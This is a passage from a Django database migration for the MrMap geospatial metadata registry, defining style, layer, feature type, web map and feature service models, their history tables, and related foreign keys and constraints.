migrations.CreateModel(
name='Style',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(editable=False, help_text="The style's Name is used in the Map request STYLES parameter to lookup the style on server side.", max_length=255, verbose_name='name')),
('title', models.CharField(editable=False, help_text='The Title is a human-readable string as an alternative for the name attribute.', max_length=255, verbose_name='title')),
('layer', models.ForeignKey(editable=False, help_text='the layer for that this style is for.', on_delete=django.db.models.deletion.CASCADE, related_name='styles', related_query_name='style', to='registry.layer', verbose_name='related layer')),
],
),
migrations.CreateModel(
name='RuleSet',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('rules', models.ManyToManyField(related_name='rule_set', to='registry.Rule')),
],
),
migrations.CreateModel(
name='HistoricalCatalougeService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example, if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as semantic version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical catalogue service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalFeatureType',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example, if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('describe_feature_type_document', models.TextField(help_text='the fetched content of the download describe feature type document.', null=True, verbose_name='describe feature type')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical feature type',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalLayer',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('preview_image', models.TextField(blank=True, max_length=100, null=True)),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('is_queryable', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer provides factual information or not. Parsed from capabilities.', verbose_name='is queryable')),
('is_opaque', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer supports transparent content or not. Parsed from capabilities.', verbose_name='is opaque')),
('is_cascaded', models.BooleanField(default=False, editable=False, help_text='WMS cascading allows exposing layers coming from other WMS servers as if they were local layers', verbose_name='is cascaded')),
('scale_min', models.FloatField(blank=True, editable=False, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will respond with empty transparent images. A None value means no restriction.', null=True, verbose_name='scale minimum value')),
('scale_max', models.FloatField(blank=True, editable=False, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will respond with empty transparent images. A None value means no restriction.', null=True, verbose_name='scale maximum value')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical layer',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalWebFeatureService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as semantic version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical web feature service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalWebMapService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as semantic version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical web map service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddConstraint(
model_name='referencesystem',
constraint=models.UniqueConstraint(fields=('code', 'prefix'), name='registry_referencesystem_unique_code_prefix'),
),
migrations.AddField(
model_name='proxysetting',
name='wfs',
field=models.OneToOneField(help_text='the security proxy settings for this service.', on_delete=django.db.models.deletion.CASCADE, related_name='web_feature_service', related_query_name='web_feature_service', to='registry.webfeatureservice', verbose_name='proxy settings'),
),
migrations.AddField(
model_name='proxysetting',
name='wms',
field=models.OneToOneField(help_text='the security proxy settings for this service.', on_delete=django.db.models.deletion.CASCADE, related_name='web_map_service', related_query_name='web_map_service', to='registry.webmapservice', verbose_name='proxy settings'),
),
migrations.AddConstraint(
model_name='metadatacontact',
constraint=models.UniqueConstraint(fields=('name', 'person_name', 'email', 'phone', 'facsimile', 'city', 'postal_code', 'address_type', 'address', 'state_or_province', 'country'), name='registry_metadatacontact_unique_together_metadata_contact'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='You can use this field to pre-filter the possible Layer selection.', null=True, on_delete=django.db.models.deletion.PROTECT, to='registry.datasetmetadata', verbose_name='Dataset Metadata'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='layer_style',
field=models.ForeignKey(blank=True, help_text='Select a style for rendering.', null=True, on_delete=django.db.models.deletion.PROTECT, to='registry.style', verbose_name='Style'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='map_context',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='map_context_layers', related_query_name='map_context_layer', to='registry.mapcontext'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='child_layers', to='registry.mapcontextlayer'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='rendering_layer',
field=models.ForeignKey(blank=True, help_text='Select a layer for rendering.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='mapcontextlayers_rendering', to='registry.layer', verbose_name='Rendering layer'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='selection_layer',
field=models.ForeignKey(blank=True, help_text='Select a layer for feature selection.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='mapcontextlayers_selection', to='registry.layer', verbose_name='Selection layer'),
),
migrations.AddField(
model_name='legendurl',
name='mime_type',
field=models.ForeignKey(editable=False, help_text='the mime type of the remote legend url', on_delete=django.db.models.deletion.RESTRICT, related_name='legend_urls', related_query_name='legend_url', to='registry.mimetype', verbose_name='internet mime type'),
),
migrations.AddField(
model_name='legendurl',
name='style',
field=models.OneToOneField(editable=False, help_text='the style entity which is linked to this legend url', on_delete=django.db.models.deletion.CASCADE, related_name='legend_url', related_query_name='legend_url', to='registry.style', verbose_name='related style'),
),
migrations.AddField(
model_name='layerconformitycheckrun',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='layerconformitycheckrun',
name='layer',
field=models.ForeignKey(blank=True, help_text='the layer targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.layer', verbose_name='layer'),
),
migrations.AddField(
model_name='layer',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='layer_metadata', related_query_name='layer_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='layer',
name='parent',
field=mptt.fields.TreeForeignKey(editable=False, help_text='the ancestor of this layer.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', related_query_name='child', to='registry.layer', verbose_name='parent layer'),
),
migrations.AddField(
model_name='layer',
name='reference_systems',
field=models.ManyToManyField(blank=True, editable=False, help_text='all reference systems which this element supports', related_name='layer', related_query_name='layer', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='layer',
name='service',
field=models.ForeignKey(editable=False, help_text='the service this element is part of', on_delete=django.db.models.deletion.CASCADE, related_name='layers', related_query_name='layer', to='registry.webmapservice', verbose_name='service'),
),
migrations.AddField(
model_name='httpresponselog',
name='request',
field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, related_name='response', related_query_name='response', to='registry.httprequestlog'),
),
migrations.AddField(
model_name='httprequestlog',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='httprequestlog',
name='wfs',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to='registry.webfeatureservice'),
),
migrations.AddField(
model_name='httprequestlog',
name='wms',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to='registry.webmapservice'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.webmapservice'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.webfeatureservice'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='historicallayer',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.layer'),
),
migrations.AddField(
model_name='historicallayer',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicallayer',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, db_constraint=False, editable=False, help_text='the ancestor of this layer.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='child', to='registry.layer', verbose_name='parent layer'),
),
migrations.AddField(
model_name='historicallayer',
name='service',
field=models.ForeignKey(blank=True, db_constraint=False, editable=False, help_text='the service this element is part of', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='layer', to='registry.webmapservice', verbose_name='service'),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.featuretype'),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='service',
field=models.ForeignKey(blank=True, db_constraint=False, editable=False, help_text='the service this element is part of', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='featuretype', to='registry.webfeatureservice', verbose_name='service'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='harvestresult',
name='service',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='harvest_results', related_query_name='harvest_result', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='featuretypeelement',
name='feature_type',
field=models.ForeignKey(help_text='related feature type of this element', on_delete=django.db.models.deletion.CASCADE, related_name='elements', related_query_name='element', to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='featuretypeconformitycheckrun',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='featuretypeconformitycheckrun',
name='feature_type',
field=models.ForeignKey(blank=True, help_text='the feature type targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='featuretype',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='featuretype_metadata', related_query_name='featuretype_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='featuretype',
name='output_formats',
field=models.ManyToManyField(blank=True, editable=False, help_text='This is a list of MIME types indicating the output formats that may be generated for a feature type. If this optional element is not specified, then all the result formats listed for the GetFeature operation are assumed to be supported.', related_name='feature_types', related_query_name='feature_type', to='registry.MimeType', verbose_name='output formats'),
),
migrations.AddField(
model_name='featuretype',
name='reference_systems',
field=models.ManyToManyField(blank=True, editable=False, help_text='all reference systems which this element supports', related_name='featuretype', related_query_name='featuretype', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='featuretype',
name='service',
field=models.ForeignKey(editable=False, help_text='the service this element is part of', on_delete=django.db.models.deletion.CASCADE, related_name='featuretypes', related_query_name='featuretype', to='registry.webfeatureservice', verbose_name='service'),
),
migrations.AddField(
model_name='dimension',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='the related dataset metadata of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_dimensions', related_query_name='dataset_metadata_dimension', to='registry.datasetmetadata', verbose_name='dataset metadata'),
),
migrations.AddField(
model_name='dimension',
name='feature_type',
field=models.ForeignKey(blank=True, help_text='the related feature type of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='feature_type_dimensions', related_query_name='feature_type_dimension', to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='dimension',
name='layer',
field=models.ForeignKey(blank=True, help_text='the related layer of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='layer_dimensions', related_query_name='layer_dimension', to='registry.layer', verbose_name='layer'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='csw',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='dataset_metadata',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.datasetmetadata'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='feature_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.featuretype'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='layer',
